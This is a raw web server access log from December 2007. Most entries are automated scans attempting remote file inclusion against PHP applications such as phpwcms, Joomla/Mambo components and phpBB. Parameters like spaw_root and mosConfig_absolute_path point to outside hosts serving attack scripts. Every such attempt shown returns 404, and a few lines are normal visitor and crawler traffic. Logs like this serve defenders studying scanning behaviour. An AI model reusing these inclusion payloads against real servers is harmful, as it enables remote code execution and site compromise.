66.79.163.27 - - [19/Dec/2007:02:21:45 -0800] "GET /convert/mvcw.php?vwar_root=http://volta21.110mb.com/bd8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.27 - - [19/Dec/2007:02:21:45 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://volta21.110mb.com/bd8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:02:22:56 -0800] "GET /logs/access_071202.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [19/Dec/2007:02:22:57 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.29.138 - - [19/Dec/2007:02:23:06 -0800] "GET /logs/access_071202.log/include/inc_ext/phpsniff/phpSniff.core.php?phpwcms[wysiwyg_editor]=http://www.monstagames.nl/accountsystem/js/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:02:23:30 -0800] "GET /logs/access_071129.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:02:23:30 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.82.85 - - [19/Dec/2007:02:23:30 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.212.130.68 - - [19/Dec/2007:02:24:48 -0800] "GET /funny/ HTTP/1.0" 200 792 "http://www.google.co.in/search?q=funny+index&hl=en&start=40&sa=N" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031007 Firebird/0.7" "www.dmulk.com"
210.212.130.68 - - [19/Dec/2007:02:24:55 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031007 Firebird/0.7" "www.dmulk.com"
210.212.130.68 - - [19/Dec/2007:02:24:58 -0800] "GET / HTTP/1.0" 200 2946 "http://www.dmulk.com/funny/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031007 Firebird/0.7" "www.dmulk.com"
74.6.24.81 - - [19/Dec/2007:02:27:00 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.160.16.207 - - [19/Dec/2007:02:39:32 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [19/Dec/2007:02:39:33 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.16.207 - - [19/Dec/2007:02:39:33 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.35 - - [19/Dec/2007:02:55:16 -0800] "GET /bikes/dteel/10MAR07/?M=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.15.252.72 - - [19/Dec/2007:02:56:13 -0800] "GET /Neos_Chronos/header.php?base_folder=http://geocities.com/ryan_fender/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.203 - - [19/Dec/2007:02:56:39 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.160 - - [19/Dec/2007:02:56:53 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.15.252.72 - - [19/Dec/2007:03:03:20 -0800] "GET /logs/access_071104.log/Neos_Chronos/header.php?base_folder=http://geocities.com/ryan_fender/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [19/Dec/2007:03:03:20 -0800] "GET /Neos_Chronos/header.php?base_folder=http://geocities.com/ryan_fender/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [19/Dec/2007:03:03:21 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://geocities.com/ryan_fender/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [19/Dec/2007:03:03:40 -0800] "GET /logs/access_071018.log/Neos_Chronos/header.php?base_folder=http://geocities.com/ryan_fender/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.60.45 - - [19/Dec/2007:03:07:08 -0800] "GET /logs/access_071202.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.45 - - [19/Dec/2007:03:07:09 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.45 - - [19/Dec/2007:03:07:09 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.142 - - [19/Dec/2007:03:18:31 -0800] "GET /logs/access_070828.log HTTP/1.0" 200 86379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.110 - - [19/Dec/2007:03:37:22 -0800] "GET /logs/access_070918.log HTTP/1.0" 200 51808 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.88.24.0 - - [19/Dec/2007:03:43:51 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [19/Dec/2007:03:43:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [19/Dec/2007:03:45:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [19/Dec/2007:03:45:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"